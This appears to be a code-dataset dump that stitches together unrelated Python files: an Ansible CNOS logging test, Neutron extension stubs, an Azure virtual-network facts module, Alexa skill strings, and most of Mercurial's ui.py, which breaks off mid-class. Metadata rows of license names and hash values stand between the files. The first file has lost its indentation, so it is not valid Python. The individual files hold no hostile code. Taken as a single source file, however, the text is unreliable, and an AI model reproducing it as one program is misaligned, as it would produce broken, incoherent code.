# (c) 2018 Red Hat Inc.
# Copyright (C) 2017 Lenovo.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat.mock import patch
from ansible.modules.network.cnos import cnos_logging
from units.modules.utils import set_module_args
from .cnos_module import TestCnosModule, load_fixture
class TestCnosLoggingModule(TestCnosModule):
module = cnos_logging
def setUp(self):
super(TestCnosLoggingModule, self).setUp()
self.mock_get_config = patch('ansible.modules.network.cnos.cnos_logging.get_config')
self.get_config = self.mock_get_config.start()
self.mock_load_config = patch('ansible.modules.network.cnos.cnos_logging.load_config')
self.load_config = self.mock_load_config.start()
def tearDown(self):
super(TestCnosLoggingModule, self).tearDown()
self.mock_get_config.stop()
self.mock_load_config.stop()
def load_fixtures(self, commands=None):
self.get_config.return_value = load_fixture('cnos_logging_config.cfg')
self.load_config.return_value = None
def test_cnos_logging_buffer_size_changed_implicit(self):
set_module_args(dict(dest='logfile', name='anil'))
commands = ['logging logfile anil 5 size 10485760']
self.execute_module(changed=True, commands=commands)
def test_cnos_logging_logfile_size_changed_explicit(self):
set_module_args(dict(dest='logfile', name='anil', level='4', size=6000))
commands = ['logging logfile anil 4 size 6000']
self.execute_module(changed=True, commands=commands)
| gpl-3.0 | -7,817,732,926,606,891,000 | -2,886,349,225,147,480,000 | 36.8 | 94 | 0.715168 | false |
eayunstack/neutron | neutron/tests/unit/extension_stubs.py | 5 | 2334 | # Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from neutron_lib.api import extensions as api_extensions
from neutron_lib.services import base
from neutron import wsgi
class StubExtension(api_extensions.ExtensionDescriptor):
def __init__(self, alias="stub_extension", optional=None):
self.alias = alias
self.optional = optional or []
def get_name(self):
return "Stub Extension"
def get_alias(self):
return self.alias
def get_description(self):
return ""
def get_updated(self):
return ""
def get_optional_extensions(self):
return self.optional
class StubExtensionWithReqs(StubExtension):
def get_required_extensions(self):
return ["foo"]
class StubPlugin(object):
def __init__(self, supported_extensions=None):
supported_extensions = supported_extensions or []
self.supported_extension_aliases = supported_extensions
class ExtensionExpectingPluginInterface(StubExtension):
"""Expect plugin to implement all methods in StubPluginInterface.
This extension expects plugin to implement all the methods defined
in StubPluginInterface.
"""
def get_plugin_interface(self):
return StubPluginInterface
class StubPluginInterface(base.ServicePluginBase):
@abc.abstractmethod
def get_foo(self, bar=None):
pass
def get_plugin_type(self):
pass
def get_plugin_description(self):
pass
class StubBaseAppController(wsgi.Controller):
def index(self, request):
return "base app index"
def show(self, request, id):
return {'fort': 'knox'}
def update(self, request, id):
return {'uneditable': 'original_value'}
| apache-2.0 | -3,177,684,949,907,701,000 | 4,301,359,875,283,028,500 | 24.369565 | 78 | 0.692374 | false |
richardcs/ansible | lib/ansible/modules/cloud/azure/azure_rm_virtualnetwork_facts.py | 7 | 5178 | #!/usr/bin/python
#
# Copyright (c) 2016 Matt Davis, <[email protected]>
# Chris Houseknecht, <[email protected]>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_virtualnetwork_facts
version_added: "2.1"
short_description: Get virtual network facts.
description:
- Get facts for a specific virtual network or all virtual networks within a resource group.
options:
name:
description:
            - Only show results for a specific virtual network.
resource_group:
description:
- Limit results by resource group. Required when filtering by name.
tags:
description:
- Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.
extends_documentation_fragment:
- azure
author:
- "Chris Houseknecht (@chouseknecht) <[email protected]>"
- "Matt Davis (@nitzmahone) <[email protected]>"
'''
EXAMPLES = '''
- name: Get facts for one virtual network
azure_rm_virtualnetwork_facts:
resource_group: Testing
name: secgroup001
- name: Get facts for all virtual networks
azure_rm_virtualnetwork_facts:
resource_group: Testing
- name: Get facts by tags
azure_rm_virtualnetwork_facts:
tags:
- testing
'''
RETURN = '''
azure_virtualnetworks:
description: List of virtual network dicts.
returned: always
type: list
example: [{
"etag": 'W/"532ba1be-ae71-40f2-9232-3b1d9cf5e37e"',
"id": "/subscriptions/XXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX/resourceGroups/Testing/providers/Microsoft.Network/virtualNetworks/vnet2001",
"location": "eastus2",
"name": "vnet2001",
"properties": {
"addressSpace": {
"addressPrefixes": [
"10.10.0.0/16"
]
},
"provisioningState": "Succeeded",
"resourceGuid": "a7ba285f-f7e7-4e17-992a-de4d39f28612",
"subnets": []
},
"type": "Microsoft.Network/virtualNetworks"
}]
'''
try:
from msrestazure.azure_exceptions import CloudError
except ImportError:
# This is handled in azure_rm_common
pass
from ansible.module_utils.azure_rm_common import AzureRMModuleBase
AZURE_OBJECT_CLASS = 'VirtualNetwork'
class AzureRMNetworkInterfaceFacts(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
name=dict(type='str'),
resource_group=dict(type='str'),
tags=dict(type='list'),
)
self.results = dict(
changed=False,
ansible_facts=dict(azure_virtualnetworks=[])
)
self.name = None
self.resource_group = None
self.tags = None
super(AzureRMNetworkInterfaceFacts, self).__init__(self.module_arg_spec,
supports_tags=False,
facts_module=True)
def exec_module(self, **kwargs):
for key in self.module_arg_spec:
setattr(self, key, kwargs[key])
if self.name is not None:
self.results['ansible_facts']['azure_virtualnetworks'] = self.get_item()
else:
self.results['ansible_facts']['azure_virtualnetworks'] = self.list_items()
return self.results
def get_item(self):
self.log('Get properties for {0}'.format(self.name))
item = None
results = []
try:
item = self.network_client.virtual_networks.get(self.resource_group, self.name)
except CloudError:
pass
if item and self.has_tags(item.tags, self.tags):
results = [self.serialize_obj(item, AZURE_OBJECT_CLASS)]
return results
def list_resource_group(self):
self.log('List items for resource group')
try:
response = self.network_client.virtual_networks.list(self.resource_group)
except CloudError as exc:
self.fail("Failed to list for resource group {0} - {1}".format(self.resource_group, str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def list_items(self):
self.log('List all for items')
try:
response = self.network_client.virtual_networks.list_all()
except CloudError as exc:
self.fail("Failed to list all items - {0}".format(str(exc)))
results = []
for item in response:
if self.has_tags(item.tags, self.tags):
results.append(self.serialize_obj(item, AZURE_OBJECT_CLASS))
return results
def main():
AzureRMNetworkInterfaceFacts()
if __name__ == '__main__':
main()
| gpl-3.0 | 7,913,536,899,729,341,000 | -2,557,707,425,947,419,600 | 27.607735 | 141 | 0.591541 | false |
benvand/alexa-stackoverflow | strings.py | 1 | 1340 | """Strings for Alexa to say"""
from settings import SITE_NAME_SPEAKABLE
SITE_NAME = SITE_NAME_SPEAKABLE
# Breaks
BREAK = '<break strength="{strength}">'
XS_BREAK = BREAK.format(strength='x-strong')
S_BREAK = BREAK.format(strength='strong')
# Greet and dismiss
WELCOME_REPROMPT = \
"""
You can ask {site_name} for an answer to a question.
For example, try, Ask {site_name}{break1} what is node j s.
""".format(site_name=SITE_NAME, break1=S_BREAK)
WELCOME = ("Welcome to the Alexa {site_name} Skill. " + WELCOME_REPROMPT).format(site_name=SITE_NAME)
GOODBYE = "Thank you for trying the Alexa {site_name} app.".format(site_name=SITE_NAME)
# Report of what has been found
REPORT_ON_QUESTION = "The closest question match on " + SITE_NAME + ' is {question}...'
REPORT_ON_ANSWER = "The top rated answer for that question by {answerer} with {votes} upvotes is {answer}."
REPORT = S_BREAK.join([REPORT_ON_QUESTION, REPORT_ON_ANSWER])
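# A hypothetical rendering of REPORT, for illustration only (the question,
# answerer, votes and answer values below are made up, not from the project):
#   REPORT.format(question='how do I parse JSON in python', answerer='j doe',
#                 votes=42, answer='use the json module')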
# Failure to parse and reprompt
FAILURE = "I'm sorry, I didn't catch your question. Please try again."
PROMPT_ASK = "Your questions will be relayed to {site_name}.".format(site_name=SITE_NAME)
# Nothing found responses
NO_QUESTIONS = "I'm sorry, that didn't return any results on {site_name}.".format(site_name=SITE_NAME)
NO_ANSWERS = NO_QUESTIONS + "However there is a question waiting to be answered."
| mit | -4,874,909,931,199,056,000 | 8,310,752,169,406,482,000 | 37.285714 | 107 | 0.723881 | false |
seewindcn/tortoisehg | src/mercurial/ui.py | 1 | 45732 | # ui.py - user interface bits for mercurial
#
# Copyright 2005-2007 Matt Mackall <[email protected]>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import errno
import getpass
import inspect
import os
import re
import socket
import sys
import tempfile
import traceback
from .i18n import _
from .node import hex
from . import (
config,
error,
formatter,
progress,
scmutil,
util,
)
samplehgrcs = {
'user':
"""# example user config (see "hg help config" for more info)
[ui]
# name and email, e.g.
# username = Jane Doe <[email protected]>
username =
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# pager =
# progress =
# color =""",
'cloned':
"""# example repository config (see "hg help config" for more info)
[paths]
default = %s
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'local':
"""# example repository config (see "hg help config" for more info)
[paths]
# path aliases to other clones of this repo in URLs or filesystem paths
# (see "hg help config.paths" for more info)
#
# default = http://example.com/hg/example-repo
# default-push = ssh://[email protected]/hg/jdoes-fork
# my-fork = ssh://[email protected]/hg/jdoes-fork
# my-clone = /home/jdoe/jdoes-clone
[ui]
# name and email (local to this repository, optional), e.g.
# username = Jane Doe <[email protected]>
""",
'global':
"""# example system-wide hg config (see "hg help config" for more info)
[extensions]
# uncomment these lines to enable some popular extensions
# (see "hg help extensions" for more info)
#
# blackbox =
# progress =
# color =
# pager =""",
}
class ui(object):
def __init__(self, src=None):
# _buffers: used for temporary capture of output
self._buffers = []
# 3-tuple describing how each buffer in the stack behaves.
# Values are (capture stderr, capture subprocesses, apply labels).
self._bufferstates = []
# When a buffer is active, defines whether we are expanding labels.
# This exists to prevent an extra list lookup.
self._bufferapplylabels = None
self.quiet = self.verbose = self.debugflag = self.tracebackflag = False
self._reportuntrusted = True
self._ocfg = config.config() # overlay
self._tcfg = config.config() # trusted
self._ucfg = config.config() # untrusted
self._trustusers = set()
self._trustgroups = set()
self.callhooks = True
if src:
self.fout = src.fout
self.ferr = src.ferr
self.fin = src.fin
self._tcfg = src._tcfg.copy()
self._ucfg = src._ucfg.copy()
self._ocfg = src._ocfg.copy()
self._trustusers = src._trustusers.copy()
self._trustgroups = src._trustgroups.copy()
self.environ = src.environ
self.callhooks = src.callhooks
self.fixconfig()
else:
self.fout = sys.stdout
self.ferr = sys.stderr
self.fin = sys.stdin
# shared read-only environment
self.environ = os.environ
# we always trust global config files
for f in scmutil.rcpath():
self.readconfig(f, trust=True)
def copy(self):
return self.__class__(self)
def formatter(self, topic, opts):
return formatter.formatter(self, topic, opts)
def _trusted(self, fp, f):
st = util.fstat(fp)
if util.isowner(st):
return True
tusers, tgroups = self._trustusers, self._trustgroups
if '*' in tusers or '*' in tgroups:
return True
user = util.username(st.st_uid)
group = util.groupname(st.st_gid)
if user in tusers or group in tgroups or user == util.username():
return True
if self._reportuntrusted:
self.warn(_('not trusting file %s from untrusted '
'user %s, group %s\n') % (f, user, group))
return False
def readconfig(self, filename, root=None, trust=False,
sections=None, remap=None):
try:
fp = open(filename)
except IOError:
if not sections: # ignore unless we were looking for something
return
raise
cfg = config.config()
trusted = sections or trust or self._trusted(fp, filename)
try:
cfg.read(filename, fp, sections=sections, remap=remap)
fp.close()
except error.ConfigError as inst:
if trusted:
raise
self.warn(_("ignored: %s\n") % str(inst))
if self.plain():
for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
'logtemplate', 'statuscopies', 'style',
'traceback', 'verbose'):
if k in cfg['ui']:
del cfg['ui'][k]
for k, v in cfg.items('defaults'):
del cfg['defaults'][k]
# Don't remove aliases from the configuration if in the exceptionlist
if self.plain('alias'):
for k, v in cfg.items('alias'):
del cfg['alias'][k]
if self.plain('revsetalias'):
for k, v in cfg.items('revsetalias'):
del cfg['revsetalias'][k]
if trusted:
self._tcfg.update(cfg)
self._tcfg.update(self._ocfg)
self._ucfg.update(cfg)
self._ucfg.update(self._ocfg)
if root is None:
root = os.path.expanduser('~')
self.fixconfig(root=root)
def fixconfig(self, root=None, section=None):
if section in (None, 'paths'):
# expand vars and ~
# translate paths relative to root (or home) into absolute paths
root = root or os.getcwd()
for c in self._tcfg, self._ucfg, self._ocfg:
for n, p in c.items('paths'):
if not p:
continue
if '%%' in p:
self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
% (n, p, self.configsource('paths', n)))
p = p.replace('%%', '%')
p = util.expandpath(p)
if not util.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
c.set("paths", n, p)
if section in (None, 'ui'):
# update ui options
self.debugflag = self.configbool('ui', 'debug')
self.verbose = self.debugflag or self.configbool('ui', 'verbose')
self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
if self.verbose and self.quiet:
self.quiet = self.verbose = False
self._reportuntrusted = self.debugflag or self.configbool("ui",
"report_untrusted", True)
self.tracebackflag = self.configbool('ui', 'traceback', False)
if section in (None, 'trusted'):
# update trust information
self._trustusers.update(self.configlist('trusted', 'users'))
self._trustgroups.update(self.configlist('trusted', 'groups'))
def backupconfig(self, section, item):
return (self._ocfg.backup(section, item),
self._tcfg.backup(section, item),
self._ucfg.backup(section, item),)
def restoreconfig(self, data):
self._ocfg.restore(data[0])
self._tcfg.restore(data[1])
self._ucfg.restore(data[2])
def setconfig(self, section, name, value, source=''):
for cfg in (self._ocfg, self._tcfg, self._ucfg):
cfg.set(section, name, value, source)
self.fixconfig(section=section)
def _data(self, untrusted):
return untrusted and self._ucfg or self._tcfg
def configsource(self, section, name, untrusted=False):
return self._data(untrusted).source(section, name) or 'none'
def config(self, section, name, default=None, untrusted=False):
if isinstance(name, list):
alternates = name
else:
alternates = [name]
for n in alternates:
value = self._data(untrusted).get(section, n, None)
if value is not None:
name = n
break
else:
value = default
if self.debugflag and not untrusted and self._reportuntrusted:
for n in alternates:
uvalue = self._ucfg.get(section, n)
if uvalue is not None and uvalue != value:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, n, uvalue))
return value
def configsuboptions(self, section, name, default=None, untrusted=False):
"""Get a config option and all sub-options.
Some config options have sub-options that are declared with the
format "key:opt = value". This method is used to return the main
option and all its declared sub-options.
Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
is a dict of defined sub-options where keys and values are strings.
"""
data = self._data(untrusted)
main = data.get(section, name, default)
if self.debugflag and not untrusted and self._reportuntrusted:
uvalue = self._ucfg.get(section, name)
if uvalue is not None and uvalue != main:
self.debug('ignoring untrusted configuration option '
'%s.%s = %s\n' % (section, name, uvalue))
sub = {}
prefix = '%s:' % name
for k, v in data.items(section):
if k.startswith(prefix):
sub[k[len(prefix):]] = v
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in sub.items():
uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
if uvalue is not None and uvalue != v:
self.debug('ignoring untrusted configuration option '
'%s:%s.%s = %s\n' % (section, name, k, uvalue))
return main, sub
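    # A minimal sketch of the sub-option syntax handled by configsuboptions()
    # above, using a hypothetical hgrc fragment (not part of the original
    # module):
    #
    #   [paths]
    #   other = https://example.com/repo
    #   other:pushurl = ssh://example.com/repo
    #
    # configsuboptions('paths', 'other') would then return
    # ('https://example.com/repo', {'pushurl': 'ssh://example.com/repo'}).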
def configpath(self, section, name, default=None, untrusted=False):
'get a path config item, expanded relative to repo root or config file'
v = self.config(section, name, default, untrusted)
if v is None:
return None
if not os.path.isabs(v) or "://" not in v:
src = self.configsource(section, name, untrusted)
if ':' in src:
base = os.path.dirname(src.rsplit(':')[0])
v = os.path.join(base, os.path.expanduser(v))
return v
def configbool(self, section, name, default=False, untrusted=False):
"""parse a configuration element as a boolean
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'true', 'yes')
>>> u.configbool(s, 'true')
True
>>> u.setconfig(s, 'false', 'no')
>>> u.configbool(s, 'false')
False
>>> u.configbool(s, 'unknown')
False
>>> u.configbool(s, 'unknown', True)
True
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbool(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a boolean ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
if isinstance(v, bool):
return v
b = util.parsebool(v)
if b is None:
raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
% (section, name, v))
return b
def configint(self, section, name, default=None, untrusted=False):
"""parse a configuration element as an integer
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'int1', '42')
>>> u.configint(s, 'int1')
42
>>> u.setconfig(s, 'int2', '-42')
>>> u.configint(s, 'int2')
-42
>>> u.configint(s, 'unknown', 7)
7
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configint(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not an integer ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
try:
return int(v)
except ValueError:
raise error.ConfigError(_("%s.%s is not an integer ('%s')")
% (section, name, v))
def configbytes(self, section, name, default=0, untrusted=False):
"""parse a configuration element as a quantity in bytes
Units can be specified as b (bytes), k or kb (kilobytes), m or
mb (megabytes), g or gb (gigabytes).
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'val1', '42')
>>> u.configbytes(s, 'val1')
42
>>> u.setconfig(s, 'val2', '42.5 kb')
>>> u.configbytes(s, 'val2')
43520
>>> u.configbytes(s, 'unknown', '7 MB')
7340032
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbytes(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a byte quantity ('somevalue')
"""
value = self.config(section, name)
if value is None:
if not isinstance(default, str):
return default
value = default
try:
return util.sizetoint(value)
except error.ParseError:
raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
% (section, name, value))
def configlist(self, section, name, default=None, untrusted=False):
"""parse a configuration element as a list of comma/space separated
strings
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'list1', 'this,is "a small" ,test')
>>> u.configlist(s, 'list1')
['this', 'is', 'a small', 'test']
"""
def _parse_plain(parts, s, offset):
whitespace = False
while offset < len(s) and (s[offset].isspace() or s[offset] == ','):
whitespace = True
offset += 1
if offset >= len(s):
return None, parts, offset
if whitespace:
parts.append('')
if s[offset] == '"' and not parts[-1]:
return _parse_quote, parts, offset + 1
elif s[offset] == '"' and parts[-1][-1] == '\\':
parts[-1] = parts[-1][:-1] + s[offset]
return _parse_plain, parts, offset + 1
parts[-1] += s[offset]
return _parse_plain, parts, offset + 1
def _parse_quote(parts, s, offset):
if offset < len(s) and s[offset] == '"': # ""
parts.append('')
offset += 1
while offset < len(s) and (s[offset].isspace() or
s[offset] == ','):
offset += 1
return _parse_plain, parts, offset
while offset < len(s) and s[offset] != '"':
if (s[offset] == '\\' and offset + 1 < len(s)
and s[offset + 1] == '"'):
offset += 1
parts[-1] += '"'
else:
parts[-1] += s[offset]
offset += 1
if offset >= len(s):
real_parts = _configlist(parts[-1])
if not real_parts:
parts[-1] = '"'
else:
real_parts[0] = '"' + real_parts[0]
parts = parts[:-1]
parts.extend(real_parts)
return None, parts, offset
offset += 1
while offset < len(s) and s[offset] in [' ', ',']:
offset += 1
if offset < len(s):
if offset + 1 == len(s) and s[offset] == '"':
parts[-1] += '"'
offset += 1
else:
parts.append('')
else:
return None, parts, offset
return _parse_plain, parts, offset
def _configlist(s):
s = s.rstrip(' ,')
if not s:
return []
parser, parts, offset = _parse_plain, [''], 0
while parser:
parser, parts, offset = parser(parts, s, offset)
return parts
result = self.config(section, name, untrusted=untrusted)
if result is None:
result = default or []
if isinstance(result, basestring):
result = _configlist(result.lstrip(' ,\n'))
if result is None:
result = default or []
return result
def hasconfig(self, section, name, untrusted=False):
return self._data(untrusted).hasitem(section, name)
def has_section(self, section, untrusted=False):
'''tell whether section exists in config.'''
return section in self._data(untrusted)
def configitems(self, section, untrusted=False, ignoresub=False):
items = self._data(untrusted).items(section)
if ignoresub:
newitems = {}
for k, v in items:
if ':' not in k:
newitems[k] = v
items = newitems.items()
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in self._ucfg.items(section):
if self._tcfg.get(section, k) != v:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, k, v))
return items
def walkconfig(self, untrusted=False):
cfg = self._data(untrusted)
for section in cfg.sections():
for name, value in self.configitems(section, untrusted):
yield section, name, value
def plain(self, feature=None):
'''is plain mode active?
Plain mode means that all configuration variables which affect
the behavior and output of Mercurial should be
ignored. Additionally, the output should be stable,
reproducible and suitable for use in scripts or applications.
The only way to trigger plain mode is by setting either the
`HGPLAIN' or `HGPLAINEXCEPT' environment variables.
The return value can either be
- False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
- True otherwise
'''
if 'HGPLAIN' not in os.environ and 'HGPLAINEXCEPT' not in os.environ:
return False
exceptions = os.environ.get('HGPLAINEXCEPT', '').strip().split(',')
if feature and exceptions:
return feature not in exceptions
return True
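    # Illustration of the HGPLAIN/HGPLAINEXCEPT behaviour implemented above
    # (hypothetical environment values, not part of the original module):
    #   HGPLAIN=1            -> plain() and plain('alias') both return True
    #   HGPLAINEXCEPT=alias  -> plain() returns True, plain('alias') returns False
    #   neither variable set -> plain() returns False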
def username(self):
"""Return default username to be used in commits.
Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
and stop searching if one of these is set.
If not found and ui.askusername is True, ask the user, else use
($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
"""
user = os.environ.get("HGUSER")
if user is None:
user = self.config("ui", ["username", "user"])
if user is not None:
user = os.path.expandvars(user)
if user is None:
user = os.environ.get("EMAIL")
if user is None and self.configbool("ui", "askusername"):
user = self.prompt(_("enter a commit username:"), default=None)
if user is None and not self.interactive():
try:
user = '%s@%s' % (util.getuser(), socket.getfqdn())
self.warn(_("no username found, using '%s' instead\n") % user)
except KeyError:
pass
if not user:
raise error.Abort(_('no username supplied'),
hint=_('use "hg config --edit" '
'to set your username'))
if "\n" in user:
raise error.Abort(_("username %s contains a newline\n")
% repr(user))
return user
def shortuser(self, user):
"""Return a short representation of a user name or email address."""
if not self.verbose:
user = util.shortuser(user)
return user
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
try:
p = self.paths.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
pass
if default:
try:
p = self.paths.getpath(default)
if p:
return p.rawloc
except error.RepoError:
pass
return loc
@util.propertycache
def paths(self):
return paths(self)
def pushbuffer(self, error=False, subproc=False, labeled=False):
"""install a buffer to capture standard output of the ui object
If error is True, the error output will be captured too.
If subproc is True, output from subprocesses (typically hooks) will be
captured too.
If labeled is True, any labels associated with buffered
output will be handled. By default, this has no effect
on the output returned, but extensions and GUI tools may
        handle this argument and return styled output. If output
is being buffered so it can be captured and parsed or
processed, labeled should not be set to True.
"""
self._buffers.append([])
self._bufferstates.append((error, subproc, labeled))
self._bufferapplylabels = labeled
def popbuffer(self):
'''pop the last buffer and return the buffered output'''
self._bufferstates.pop()
if self._bufferstates:
self._bufferapplylabels = self._bufferstates[-1][2]
else:
self._bufferapplylabels = None
return "".join(self._buffers.pop())
def write(self, *args, **opts):
'''write args to output
By default, this method simply writes to the buffer or stdout,
but extensions or GUI tools may override this method,
write_err(), popbuffer(), and label() to style output from
various parts of hg.
An optional keyword argument, "label", can be passed in.
This should be a string containing label names separated by
space. Label names take the form of "topic.type". For example,
ui.debug() issues a label of "ui.debug".
When labeling output for a specific command, a label of
"cmdname.type" is recommended. For example, status issues
a label of "status.modified" for modified files.
'''
if self._buffers:
self._buffers[-1].extend(a for a in args)
else:
self._progclear()
for a in args:
self.fout.write(a)
def write_err(self, *args, **opts):
self._progclear()
try:
if self._bufferstates and self._bufferstates[-1][0]:
return self.write(*args, **opts)
if not getattr(self.fout, 'closed', False):
self.fout.flush()
for a in args:
self.ferr.write(a)
# stderr may be buffered under win32 when redirected to files,
# including stdout.
if not getattr(self.ferr, 'closed', False):
self.ferr.flush()
except IOError as inst:
if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
raise
def flush(self):
try: self.fout.flush()
except (IOError, ValueError): pass
try: self.ferr.flush()
except (IOError, ValueError): pass
def _isatty(self, fh):
if self.configbool('ui', 'nontty', False):
return False
return util.isatty(fh)
def interactive(self):
'''is interactive input allowed?
An interactive session is a session where input can be reasonably read
from `sys.stdin'. If this function returns false, any attempt to read
from stdin should fail with an error, unless a sensible default has been
specified.
Interactiveness is triggered by the value of the `ui.interactive'
configuration variable or - if it is unset - when `sys.stdin' points
to a terminal device.
This function refers to input only; for output, see `ui.formatted()'.
'''
i = self.configbool("ui", "interactive", None)
if i is None:
# some environments replace stdin without implementing isatty
# usually those are non-interactive
return self._isatty(self.fin)
return i
def termwidth(self):
'''how wide is the terminal in columns?
'''
if 'COLUMNS' in os.environ:
try:
return int(os.environ['COLUMNS'])
except ValueError:
pass
return util.termwidth()
def formatted(self):
'''should formatted output be used?
        It is often desirable to format the output to suit the output medium.
        Examples of this are truncating long lines or colorizing messages.
        However, this is often not desirable when piping output into other
utilities, e.g. `grep'.
Formatted output is triggered by the value of the `ui.formatted'
configuration variable or - if it is unset - when `sys.stdout' points
to a terminal device. Please note that `ui.formatted' should be
considered an implementation detail; it is not intended for use outside
Mercurial or its extensions.
This function refers to output only; for input, see `ui.interactive()'.
This function always returns false when in plain mode, see `ui.plain()'.
'''
if self.plain():
return False
i = self.configbool("ui", "formatted", None)
if i is None:
# some environments replace stdout without implementing isatty
# usually those are non-interactive
return self._isatty(self.fout)
return i
def _readline(self, prompt=''):
if self._isatty(self.fin):
try:
# magically add command line editing support, where
# available
import readline
# force demandimport to really load the module
readline.read_history_file
# windows sometimes raises something other than ImportError
except Exception:
pass
# call write() so output goes through subclassed implementation
# e.g. color extension on Windows
self.write(prompt)
# instead of trying to emulate raw_input, swap (self.fin,
# self.fout) with (sys.stdin, sys.stdout)
oldin = sys.stdin
oldout = sys.stdout
sys.stdin = self.fin
sys.stdout = self.fout
# prompt ' ' must exist; otherwise readline may delete entire line
# - http://bugs.python.org/issue12833
line = raw_input(' ')
sys.stdin = oldin
sys.stdout = oldout
# When stdin is in binary mode on Windows, it can cause
# raw_input() to emit an extra trailing carriage return
if os.linesep == '\r\n' and line and line[-1] == '\r':
line = line[:-1]
return line
def prompt(self, msg, default="y"):
"""Prompt user with msg, read response.
If ui is not interactive, the default is returned.
"""
if not self.interactive():
self.write(msg, ' ', default or '', "\n")
return default
try:
r = self._readline(self.label(msg, 'ui.prompt'))
if not r:
r = default
if self.configbool('ui', 'promptecho'):
self.write(r, "\n")
return r
except EOFError:
raise error.ResponseExpected()
@staticmethod
def extractchoices(prompt):
"""Extract prompt message and list of choices from specified prompt.
This returns tuple "(message, choices)", and "choices" is the
list of tuple "(response character, text without &)".
>>> ui.extractchoices("awake? $$ &Yes $$ &No")
('awake? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("line\\nbreak? $$ &Yes $$ &No")
('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("want lots of $$money$$?$$Ye&s$$N&o")
('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
"""
# Sadly, the prompt string may have been built with a filename
# containing "$$" so let's try to find the first valid-looking
# prompt to start parsing. Sadly, we also can't rely on
# choices containing spaces, ASCII, or basically anything
# except an ampersand followed by a character.
m = re.match(r'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
msg = m.group(1)
choices = [p.strip(' ') for p in m.group(2).split('$$')]
return (msg,
[(s[s.index('&') + 1].lower(), s.replace('&', '', 1))
for s in choices])
def promptchoice(self, prompt, default=0):
"""Prompt user with a message, read response, and ensure it matches
one of the provided choices. The prompt is formatted as follows:
"would you like fries with that (Yn)? $$ &Yes $$ &No"
The index of the choice is returned. Responses are case
insensitive. If ui is not interactive, the default is
returned.
"""
msg, choices = self.extractchoices(prompt)
resps = [r for r, t in choices]
while True:
r = self.prompt(msg, resps[default])
if r.lower() in resps:
return resps.index(r.lower())
self.write(_("unrecognized response\n"))
def getpass(self, prompt=None, default=None):
if not self.interactive():
return default
try:
self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
# disable getpass() only if explicitly specified. it's still valid
# to interact with tty even if fin is not a tty.
if self.configbool('ui', 'nontty'):
return self.fin.readline().rstrip('\n')
else:
return getpass.getpass('')
except EOFError:
raise error.ResponseExpected()
def status(self, *msg, **opts):
